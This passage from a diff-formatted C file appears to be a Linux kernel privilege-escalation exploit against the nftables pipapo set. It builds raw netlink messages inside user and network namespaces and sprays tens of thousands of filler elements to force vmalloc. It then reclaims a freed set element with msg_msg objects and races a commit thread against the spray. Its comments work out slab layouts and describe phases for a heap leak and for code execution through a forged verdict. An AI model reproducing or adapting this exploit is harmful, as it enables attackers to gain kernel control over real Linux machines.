NFTA_SET_ELEM_USERDATA 6 /* enum nft_set_elem_attributes: UNSPEC=0,KEY=1,DATA=2,FLAGS=3,TIMEOUT=4,EXPIRATION=5,USERDATA=6 */ +#endif + +#define BUF_SIZE (8 * 1024 * 1024) +/* 66K fillers → lt_size > 4MB → vmalloc (KMALLOC_MAX_SIZE=4MB on COS-121) + * Count must be ≡ 31 (mod 32) so the target fills the last slab page slot. + * This ensures ALL adjacent objects are fillers (genmask=0), preventing: + * - EXPRESSIONS crash (next object byte 0 = 0 → elem_expr->size = 0) + * - Expiration false-skip (third object has small offsets → "not expired") + */ +/* Target slot = NUM_FILLERS mod 32. After msg_msg reclaim, + * offset[EXPIRATION] = 0xFF (byte 6 of kernel ptr) → reads ext+1020. + * For target at slot N: ext+1020 = N*128+1020. Must be < 4096 (page size) + * → N ≤ 24. So NUM_FILLERS mod 32 must be ≤ 24. + * 130000 mod 32 = 16 → target at slot 16 → ext+1020 = 3068 ✓ (in-page) + * Still > 4MB lt_size → vmalloc forced. */ +#define NUM_FILLERS 66000 /* Just over 64K → lt_size ~4.03MB > 4MB → vmalloc forced */ +#define NUM_TARGETS 1 +#define NUM_PADDING 0 /* Disabled for fast setup; 66K fillers sufficient for vmalloc */ +#define BATCH_CHUNK 2500 + +/* Target element has USERDATA extension → 305 bytes → kmalloc-cg-512. + * 512-byte aligned objects guarantee: + * byte 0 (genmask) = 0x00 → always active ✓ + * byte 8 (offset[EXPRESSIONS]) = 0x00 → no expr eval → no crash ✓ + * AND: offset[EXPIRATION] = 0xFF (byte 6) → reads ext+255 which is + * WITHIN the same 512-byte object → reads mtext data → positive jiffies + * → NOT expired ✓ (This was broken in kmalloc-cg-256 where ext+255 + * crossed into the next object's m_list.next kernel pointer → negative + * signed jiffies → always "expired" → lookup skipped the element.) */ +#define TARGET_UDATA_LEN 200 /* 104 + 1 + 200 = 305 → kmalloc-cg-512 */ + +/* Spray: msg_msg header=48 + data=464 = 512 → kmalloc-cg-512 (same as target) */ +#define NUM_SPRAY_QUEUES 512 +#define NUM_RECLAIM_QUEUES 256 +#define SPRAY_MSG_DSIZE 464 +#define MAX_SPRAY_MSGS 65536 +#define MAX_CYCLES 10 + +/* No pre-spray needed: 130K fillers now in kmalloc-cg-128 (same cache as target) + * due to TIMEOUT extension from non-default timeout (3599999ms ≠ 3600000ms). */ + +#define die(fmt, ...) do { fprintf(stderr, "[-] " fmt "\n", ##__VA_ARGS__); exit(1); } while(0) + +/* ====== NLA helpers ====== */ +static void nla_put(char *buf, int *off, uint16_t type, const void *data, int len) { + struct { uint16_t nla_len; uint16_t nla_type; } *a = (decltype(a))(buf + *off); + a->nla_len = 4 + len; a->nla_type = type; + if (data && len > 0) memcpy(buf + *off + 4, data, len); + *off += (4 + len + 3) & ~3; +} +static void nla_put_str(char *buf, int *off, uint16_t type, const char *s) { + nla_put(buf, off, type, s, strlen(s) + 1); +} +static void nla_put_u32(char *buf, int *off, uint16_t type, uint32_t v) { + v = H32(v); nla_put(buf, off, type, &v, 4); +} +static void nla_put_u64(char *buf, int *off, uint16_t type, uint64_t v) { + v = htobe64(v); nla_put(buf, off, type, &v, 8); +} +static int nest_start(char *buf, int *off, uint16_t type) { + int s = *off; + struct { uint16_t nla_len; uint16_t nla_type; } *a = (decltype(a))(buf + *off); + a->nla_len = 0; a->nla_type = type | NLA_F_NESTED; + *off += 4; return s; +} +static void nest_end(char *buf, int *off, int s) { + ((uint16_t *)(buf + s))[0] = *off - s; +} + +/* ====== Netlink ====== */ +static void msg_hdr(char *buf, int *off, uint16_t type, uint16_t flags, uint8_t fam) { + struct nlmsghdr *n = (struct nlmsghdr *)(buf + *off); + n->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | type; + n->nlmsg_flags = NLM_F_REQUEST | flags; + n->nlmsg_seq = n->nlmsg_pid = 0; + *off += sizeof(*n); + struct nfgenmsg *g = (struct nfgenmsg *)(buf + *off); + g->nfgen_family = fam; g->version = NFNETLINK_V0; g->res_id = 0; + *off += sizeof(*g); +} +static void msg_end(char *buf, int hdr, int *off) { + ((struct nlmsghdr *)(buf + hdr))->nlmsg_len = *off - hdr; +} +static void batch_begin(char *buf, int *off) { + struct nlmsghdr *n = (struct nlmsghdr *)(buf + *off); + n->nlmsg_type = NFNL_MSG_BATCH_BEGIN; n->nlmsg_flags = NLM_F_REQUEST; + n->nlmsg_seq = n->nlmsg_pid = 0; + n->nlmsg_len = sizeof(*n) + sizeof(struct nfgenmsg); + *off += sizeof(*n); + struct nfgenmsg *g = (struct nfgenmsg *)(buf + *off); + g->nfgen_family = AF_UNSPEC; g->version = NFNETLINK_V0; + g->res_id = H32(NFNL_SUBSYS_NFTABLES) >> 16; + *off += sizeof(*g); +} +static void batch_end(char *buf, int *off) { + struct nlmsghdr *n = (struct nlmsghdr *)(buf + *off); + n->nlmsg_type = NFNL_MSG_BATCH_END; n->nlmsg_flags = NLM_F_REQUEST; + n->nlmsg_seq = n->nlmsg_pid = 0; + n->nlmsg_len = sizeof(*n) + sizeof(struct nfgenmsg); + *off += sizeof(*n); + struct nfgenmsg *g = (struct nfgenmsg *)(buf + *off); + g->nfgen_family = AF_UNSPEC; g->version = NFNETLINK_V0; + g->res_id = H32(NFNL_SUBSYS_NFTABLES) >> 16; + *off += sizeof(*g); +} + +static void write_file(const char *p, const char *d) { + int fd = open(p, O_WRONLY); if (fd < 0) return; + ssize_t n = write(fd, d, strlen(d)); (void)n; close(fd); +} + +static void setup_ns(void) { + uid_t uid = getuid(); gid_t gid = getgid(); + char m[64]; + if (unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWIPC) < 0) { + /* Fall back without IPC namespace */ + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) + die("unshare: %s", strerror(errno)); + printf("[*] IPC namespace: shared (host)\n"); + } else { + printf("[*] IPC namespace: private\n"); + } + write_file("/proc/self/setgroups", "deny"); + snprintf(m, sizeof(m), "0 %d 1\n", uid); write_file("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %d 1\n", gid); write_file("/proc/self/gid_map", m); +} + +static void setup_lo(void) { + /* Bring up loopback for both IPv4 and IPv6 */ + int fd = socket(AF_INET, SOCK_DGRAM, 0); + struct ifreq ifr = {}; strncpy(ifr.ifr_name, "lo", IFNAMSIZ); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + /* IPv6 ::1 is auto-assigned when lo comes up in a new netns */ + usleep(100000); /* 100ms for IPv6 DAD */ +} + +static int nl_open(void) { + int fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER); + if (fd < 0) die("nl socket: %s", strerror(errno)); + struct sockaddr_nl a = { .nl_family = AF_NETLINK }; + if (bind(fd, (struct sockaddr *)&a, sizeof(a)) < 0) die("nl bind"); + int bs = 16<<20; + setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &bs, sizeof(bs)); + setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &bs, sizeof(bs)); + return fd; +} + +static int nl_send(int fd, char *buf, int len) { + struct sockaddr_nl a = { .nl_family = AF_NETLINK }; + struct iovec v = {}; v.iov_base = buf; v.iov_len = len; + struct msghdr m = {}; m.msg_name = &a; m.msg_namelen = sizeof(a); m.msg_iov = &v; m.msg_iovlen = 1; + return sendmsg(fd, &m, 0) < 0 ? -errno : 0; +} + +static int nl_recv_ack(int fd) { + char r[16384]; + struct timeval tv = { 120, 0 }; + setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + int n = recv(fd, r, sizeof(r), 0); + if (n < 0) return -errno; + for (struct nlmsghdr *h = (struct nlmsghdr *)r; NLMSG_OK(h, (unsigned int)n); h = NLMSG_NEXT(h, n)) { + if (h->nlmsg_type == NLMSG_ERROR) { + int e = ((struct nlmsgerr *)NLMSG_DATA(h))->error; + if (e) return e; + } + } + return 0; +} + +static int nl_do(int fd, char *buf, int len) { + int r = nl_send(fd, buf, len); + if (r) return r; + return nl_recv_ack(fd); +} + +/* ====== NFT operations ====== */ +static int nft_table(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWTABLE, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_TABLE_NAME, "t"); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +static int nft_chain(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWCHAIN, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_CHAIN_TABLE, "t"); + nla_put_str(buf, &off, NFTA_CHAIN_NAME, "c"); + uint32_t pol = H32(NF_ACCEPT); + nla_put(buf, &off, NFTA_CHAIN_POLICY, &pol, 4); + int hk = nest_start(buf, &off, NFTA_CHAIN_HOOK); + nla_put_u32(buf, &off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nla_put_u32(buf, &off, NFTA_HOOK_PRIORITY, 0); + nest_end(buf, &off, hk); + nla_put_str(buf, &off, NFTA_CHAIN_TYPE, "filter"); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +static int nft_set_common(int fd, char *buf, const char *name, int id, + uint32_t data_type, uint32_t data_len) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWSET, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_NAME, name); + nla_put_u32(buf, &off, NFTA_SET_ID, id); + nla_put_u32(buf, &off, NFTA_SET_FLAGS, + NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_CONCAT | NFT_SET_MAP); + nla_put_u32(buf, &off, NFTA_SET_KEY_LEN, 32); /* Two 16-byte fields */ + nla_put_u32(buf, &off, NFTA_SET_KEY_TYPE, 0); + nla_put_u32(buf, &off, NFTA_SET_DATA_TYPE, data_type); + nla_put_u32(buf, &off, NFTA_SET_DATA_LEN, data_len); + nla_put_u64(buf, &off, NFTA_SET_TIMEOUT, 3600000ULL); /* 1hr default */ + nla_put_u32(buf, &off, NFTA_SET_GC_INTERVAL, 1000); /* 1s GC */ + /* Concat desc: 2 fields of 16 bytes each */ + int d = nest_start(buf, &off, NFTA_SET_DESC); + int cc = nest_start(buf, &off, NFTA_SET_DESC_CONCAT); + int f1 = nest_start(buf, &off, 1); + nla_put_u32(buf, &off, NFTA_SET_FIELD_LEN, 16); + nest_end(buf, &off, f1); + int f2 = nest_start(buf, &off, 1); + nla_put_u32(buf, &off, NFTA_SET_FIELD_LEN, 16); + nest_end(buf, &off, f2); + nest_end(buf, &off, cc); + nest_end(buf, &off, d); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* Data map set "s" — for Phase 1 heap leak observation */ +static int nft_set(int fd, char *buf) { + return nft_set_common(fd, buf, "s", 1, 1 /* NFT_DATA_VALUE */, 8); +} + +/* Verdict map set "v" — for Phase 3 code execution. + * NFT_DATA_VERDICT = 0xffffff00. Data len = 16 (sizeof nft_data verdict). */ +#define NFT_DATA_VERDICT 0xffffff00U +static int nft_set_v(int fd, char *buf) { + return nft_set_common(fd, buf, "v", 2, NFT_DATA_VERDICT, 16); +} + +static void add_payload_expr(char *buf, int *off, uint32_t dreg, uint32_t base, + uint32_t offset, uint32_t len) { + int e = nest_start(buf, off, 1); + nla_put_str(buf, off, NFTA_EXPR_NAME, "payload"); + int d = nest_start(buf, off, NFTA_EXPR_DATA); + nla_put_u32(buf, off, NFTA_PAYLOAD_DREG, dreg); + nla_put_u32(buf, off, NFTA_PAYLOAD_BASE, base); + nla_put_u32(buf, off, NFTA_PAYLOAD_OFFSET, offset); + nla_put_u32(buf, off, NFTA_PAYLOAD_LEN, len); + nest_end(buf, off, d); + nest_end(buf, off, e); +} + +static int nft_rule(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWRULE, + NLM_F_CREATE|NLM_F_APPEND|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_RULE_TABLE, "t"); + nla_put_str(buf, &off, NFTA_RULE_CHAIN, "c"); + int exprs = nest_start(buf, &off, NFTA_RULE_EXPRESSIONS); + + /* Extract src IPv6 (16 bytes at offset 8 from network header) → REG_1 */ + add_payload_expr(buf, &off, NFT_REG_1, NFT_PAYLOAD_NETWORK_HEADER, 8, 16); + /* Extract dst IPv6 (16 bytes at offset 24 from network header) → REG_2 */ + add_payload_expr(buf, &off, NFT_REG_2, NFT_PAYLOAD_NETWORK_HEADER, 24, 16); + + /* Lookup in set "s", sreg=REG_1 (reads 32 bytes: REG_1+REG_2), dreg=REG_3 */ + int le = nest_start(buf, &off, 1); + nla_put_str(buf, &off, NFTA_EXPR_NAME, "lookup"); + int ld = nest_start(buf, &off, NFTA_EXPR_DATA); + nla_put_str(buf, &off, NFTA_LOOKUP_SET, "s"); + nla_put_u32(buf, &off, NFTA_LOOKUP_SREG, NFT_REG_1); + nla_put_u32(buf, &off, NFTA_LOOKUP_DREG, NFT_REG_3); + nest_end(buf, &off, ld); + nest_end(buf, &off, le); + + /* Write REG_3 data to transport header + 8 (UDP payload first 8 bytes) */ + int pe = nest_start(buf, &off, 1); + nla_put_str(buf, &off, NFTA_EXPR_NAME, "payload"); + int pd = nest_start(buf, &off, NFTA_EXPR_DATA); + nla_put_u32(buf, &off, NFTA_PAYLOAD_SREG, NFT_REG_3); + nla_put_u32(buf, &off, NFTA_PAYLOAD_BASE, NFT_PAYLOAD_TRANSPORT_HEADER); + nla_put_u32(buf, &off, NFTA_PAYLOAD_OFFSET, 8); + nla_put_u32(buf, &off, NFTA_PAYLOAD_LEN, 8); + nest_end(buf, &off, pd); + nest_end(buf, &off, pe); + + nest_end(buf, &off, exprs); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* Forward declarations for key builders (defined later) */ +static void build_filler_key(uint8_t *key, int idx); +static void build_filler_key_end(uint8_t *key, int idx); +static void build_target_key(uint8_t *key); + +/* Verdict map lookup rule: payload → lookup(v, dreg=VERDICT). + * When lookup succeeds, verdict is set from ext DATA (our controlled fake verdict). */ +static int nft_rule_v(int fd, char *buf) { + int off = 0; batch_begin(buf, &off); + int h = off; msg_hdr(buf, &off, NFT_MSG_NEWRULE, + NLM_F_CREATE|NLM_F_APPEND|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_RULE_TABLE, "t"); + nla_put_str(buf, &off, NFTA_RULE_CHAIN, "c"); + int exprs = nest_start(buf, &off, NFTA_RULE_EXPRESSIONS); + + /* Extract src IPv6 → REG_1 */ + add_payload_expr(buf, &off, NFT_REG_1, NFT_PAYLOAD_NETWORK_HEADER, 8, 16); + /* Extract dst IPv6 → REG_2 */ + add_payload_expr(buf, &off, NFT_REG_2, NFT_PAYLOAD_NETWORK_HEADER, 24, 16); + + /* Lookup in verdict map "v", sreg=REG_1, dreg=NFT_REG_VERDICT (=0) */ + int le = nest_start(buf, &off, 1); + nla_put_str(buf, &off, NFTA_EXPR_NAME, "lookup"); + int ld = nest_start(buf, &off, NFTA_EXPR_DATA); + nla_put_str(buf, &off, NFTA_LOOKUP_SET, "v"); + nla_put_u32(buf, &off, NFTA_LOOKUP_SREG, NFT_REG_1); + nla_put_u32(buf, &off, NFTA_LOOKUP_DREG, 0); /* NFT_REG_VERDICT = 0 */ + nest_end(buf, &off, ld); + nest_end(buf, &off, le); + + nest_end(buf, &off, exprs); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* Add fillers to a named set. Same logic as add_fillers but takes set name. */ +static int add_fillers_to(int fd, char *buf, int count, const char *setname) { + int sent = 0; + uint8_t key[32], key_end[32]; + + while (sent < count) { + int off = 0; + batch_begin(buf, &off); + int chunk = 0; + for (; chunk < BATCH_CHUNK && sent + chunk < count; chunk++) { + int idx = sent + chunk; + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | (chunk == BATCH_CHUNK-1 || sent+chunk == count-1 ? NLM_F_ACK : 0), + NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, setname); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_filler_key(key, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + build_filler_key_end(key_end, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key_end, 32); + nest_end(buf, &off, ke); + /* Data: verdict map uses NFTA_DATA_VERDICT nested attr */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + int vd = nest_start(buf, &off, 2 /* NFTA_DATA_VERDICT */); + nla_put_u32(buf, &off, 1 /* NFTA_VERDICT_CODE */, 0xFFFFFFFF /* NFT_CONTINUE */); + nest_end(buf, &off, vd); + nest_end(buf, &off, dt); } + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 3599999ULL); + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); + if (off > BUF_SIZE - 4096) break; + } + batch_end(buf, &off); + int r = nl_do(fd, buf, off); + if (r) { printf("[!] Filler batch at %d for %s failed: %d\n", sent, setname, r); return r; } + sent += chunk; + if (sent % 5000 == 0 || sent >= count) + printf("[+] Fillers(%s): %d/%d\n", setname, sent, count); + } + return 0; +} + +/* Add target element to verdict map "v" with USERDATA (→ kmalloc-cg-512) */ +static int add_target_v(int fd, char *buf) { + uint8_t key[32]; + int off = 0; batch_begin(buf, &off); + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "v"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_target_key(key); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, ke); + /* Data: NFT_CONTINUE verdict (will be overwritten by our UAF spray) */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + int vd = nest_start(buf, &off, 2 /* NFTA_DATA_VERDICT */); + nla_put_u32(buf, &off, 1 /* NFTA_VERDICT_CODE */, 0xFFFFFFFF /* NFT_CONTINUE */); + nest_end(buf, &off, vd); + nest_end(buf, &off, dt); } + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 2000ULL); /* 2s timeout */ + { uint8_t udata[TARGET_UDATA_LEN]; + memset(udata, 0xCC, TARGET_UDATA_LEN); + nla_put(buf, &off, NFTA_SET_ELEM_USERDATA, udata, TARGET_UDATA_LEN); + } + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + +/* + * Build IPv6 key bytes (32 bytes: src_ipv6 ++ dst_ipv6). + * For filler N: src = 2001:db8:0:0:0:0:XXYY:0, dst = same + * where XX = N >> 8, YY = N & 0xFF + */ +static void build_filler_key(uint8_t *key, int idx) { + memset(key, 0, 32); + /* src_ipv6 = 2001:0db8::XXYY:0000 */ + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb8; + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + /* dst_ipv6 = same as src */ + memcpy(key + 16, key, 16); +} + +static void build_filler_key_end(uint8_t *key, int idx) { + memset(key, 0, 32); + /* src_ipv6 end = 2001:0db8::XXYY:00FF */ + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb8; + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + key[15] = 0xFF; + /* dst_ipv6 end = same */ + memcpy(key + 16, key, 16); +} + +/* Target key: src=::1, dst=::1 (point range) */ +static void build_target_key(uint8_t *key) { + memset(key, 0, 32); + key[15] = 1; /* src = ::1 */ + key[31] = 1; /* dst = ::1 */ +} + +static int add_fillers(int fd, char *buf, int count) { + int sent = 0; + uint8_t key[32], key_end[32]; + + while (sent < count) { + int off = 0; + batch_begin(buf, &off); + int chunk = 0; + for (; chunk < BATCH_CHUNK && sent + chunk < count; chunk++) { + int idx = sent + chunk; + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | (chunk == BATCH_CHUNK-1 || sent+chunk == count-1 ? NLM_F_ACK : 0), + NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "s"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + /* Key */ + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_filler_key(key, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + /* Key end */ + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + build_filler_key_end(key_end, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key_end, 32); + nest_end(buf, &off, ke); + /* Data */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0xDEADBEEFCAFE0000ULL | (idx & 0xFFFF); + nla_put(buf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(buf, &off, dt); } + /* Timeout differs from set default (3600000) to force TIMEOUT extension. + * Without this: 96B (KEY+KEY_END+DATA+EXPIRATION) → kmalloc-cg-96 + * With this: 104B (+TIMEOUT) → kmalloc-cg-128, same cache as target */ + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 3599999ULL); + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); + if (off > BUF_SIZE - 4096) break; + } + batch_end(buf, &off); + int r = nl_do(fd, buf, off); + if (r) { printf("[!] Filler batch at %d failed: %d\n", sent, r); return r; } + sent += chunk; + if (sent % 5000 == 0 || sent >= count) + printf("[+] Fillers: %d/%d\n", sent, count); + } + return 0; +} + +/* Padding elements: use 2001:db9:: prefix, NO per-element timeout → + * 96 bytes (KEY+KEY_END+DATA+EXPIRATION) → kmalloc-cg-96. + * These inflate pipapo lt_size without polluting kmalloc-cg-128. */ +static void build_padding_key(uint8_t *key, int idx) { + memset(key, 0, 32); + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb9; /* 2001:0db9:: */ + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + memcpy(key + 16, key, 16); +} + +static void build_padding_key_end(uint8_t *key, int idx) { + memset(key, 0, 32); + key[0] = 0x20; key[1] = 0x01; + key[2] = 0x0d; key[3] = 0xb9; + key[12] = (idx >> 8) & 0xFF; + key[13] = idx & 0xFF; + key[15] = 0xFF; + memcpy(key + 16, key, 16); +} + +static int add_padding(int fd, char *buf, int count) { + int sent = 0; + uint8_t key[32], key_end[32]; + + while (sent < count) { + int off = 0; + batch_begin(buf, &off); + int chunk = 0; + for (; chunk < BATCH_CHUNK && sent + chunk < count; chunk++) { + int idx = sent + chunk; + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, + NLM_F_CREATE | (chunk == BATCH_CHUNK-1 || sent+chunk == count-1 ? NLM_F_ACK : 0), + NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "s"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_padding_key(key, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + build_padding_key_end(key_end, idx); + nla_put(buf, &off, NFTA_DATA_VALUE, key_end, 32); + nest_end(buf, &off, ke); + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0; + nla_put(buf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(buf, &off, dt); } + /* NO NFTA_SET_ELEM_TIMEOUT → uses set default 3600000ms → + * no TIMEOUT extension → 96B → kmalloc-cg-96 */ + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); + if (off > BUF_SIZE - 4096) break; + } + batch_end(buf, &off); + int r = nl_do(fd, buf, off); + if (r) { printf("[!] Padding batch at %d failed: %d\n", sent, r); return r; } + sent += chunk; + if (sent % 10000 == 0 || sent >= count) + printf("[+] Padding: %d/%d\n", sent, count); + } + return 0; +} + +static int add_target(int fd, char *buf) { + uint8_t key[32]; + int off = 0; batch_begin(buf, &off); + int h = off; + msg_hdr(buf, &off, NFT_MSG_NEWSETELEM, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(buf, &off, NFTA_SET_ELEM_LIST_SET, "s"); + int els = nest_start(buf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(buf, &off, 1); + /* Key: (::1, ::1) */ + int k = nest_start(buf, &off, NFTA_SET_ELEM_KEY); + build_target_key(key); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, k); + /* Key end: same (point range) */ + int ke = nest_start(buf, &off, NFTA_SET_ELEM_KEY_END); + nla_put(buf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(buf, &off, ke); + /* Data: recognizable pattern */ + { int dt = nest_start(buf, &off, NFTA_SET_ELEM_DATA); + uint64_t dval = 0xAAAAAAAAAAAAAAAAULL; + nla_put(buf, &off, NFTA_DATA_VALUE, &dval, 8); + nest_end(buf, &off, dt); } + /* Short timeout: 2 seconds */ + nla_put_u64(buf, &off, NFTA_SET_ELEM_TIMEOUT, 2000ULL); + /* USERDATA: pushes target to kmalloc-cg-512 (separate from fillers in -128). + * 512-byte aligned: byte 0 (genmask)=0, byte 8 (EXPRESSIONS)=0 → no crash. + * offset[EXPIRATION]=0xFF → ext+255 stays WITHIN 512B object → mtext → not expired */ + { uint8_t udata[TARGET_UDATA_LEN]; + memset(udata, 0xCC, TARGET_UDATA_LEN); + nla_put(buf, &off, NFTA_SET_ELEM_USERDATA, udata, TARGET_UDATA_LEN); + } + nest_end(buf, &off, el); + nest_end(buf, &off, els); + msg_end(buf, h, &off); batch_end(buf, &off); + return nl_do(fd, buf, off); +} + + +static uint64_t now_us(void) { + struct timespec ts; + clock_gettime(CLOCK_MONOTONIC, &ts); + return (uint64_t)ts.tv_sec * 1000000ULL + ts.tv_nsec / 1000; +} + +/* Commit thread — runs nft_commit on CPU 0 so call_rcu(kfree) enqueues on CPU 0. + * The main thread on CPU 0 sprays concurrently via msgsnd syscalls. + * During vmalloc's cond_resched, the scheduler switches between them. */ +struct commit_ctx { + volatile int go; + volatile int done; + volatile int result; + volatile uint64_t t_start; + volatile uint64_t t_done; + int fd; + int idx; + int use_verdict_set; /* If nonzero, add dummy to set "v" (verdict map) */ +}; + +static void *commit_fn(void *arg) { + struct commit_ctx *ctx = (struct commit_ctx *)arg; + /* Build commit message in thread-local buffer */ + char *cbuf = (char *)malloc(4096); + if (!cbuf) { ctx->result = -ENOMEM; ctx->done = 1; return NULL; } + + uint8_t key[32]; + int off = 0; + batch_begin(cbuf, &off); + int h = off; + msg_hdr(cbuf, &off, NFT_MSG_NEWSETELEM, NLM_F_CREATE|NLM_F_ACK, NFPROTO_INET); + nla_put_str(cbuf, &off, NFTA_SET_ELEM_LIST_TABLE, "t"); + nla_put_str(cbuf, &off, NFTA_SET_ELEM_LIST_SET, + ctx->use_verdict_set ? "v" : "s"); + int els = nest_start(cbuf, &off, NFTA_SET_ELEM_LIST_ELEMENTS); + int el = nest_start(cbuf, &off, 1); + memset(key, 0, 32); + key[0] = 0xfc; key[13] = (ctx->idx >> 8) & 0xFF; key[14] = ctx->idx & 0xFF; + memcpy(key + 16, key, 16); + int k = nest_start(cbuf, &off, NFTA_SET_ELEM_KEY); + nla_put(cbuf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(cbuf, &off, k); + int ke = nest_start(cbuf, &off, NFTA_SET_ELEM_KEY_END); + nla_put(cbuf, &off, NFTA_DATA_VALUE, key, 32); + nest_end(cbuf, &off, ke); + if (ctx->use_verdict_set) { + /* Verdict data: NFT_CONTINUE */ + int dt = nest_start(cbuf, &off, NFTA_SET_ELEM_DATA); + int vd = nest_start(cbuf, &off, 2 /* NFTA_DATA_VERDICT */); + nla_put_u32(cbuf, &off, 1 /* NFTA_VERDICT_CODE */, 0xFFFFFFFF); + nest_end(cbuf, &off, vd); + nest_end(cbuf, &off, dt); + } else { + int dt = nest_start(cbuf, &off, 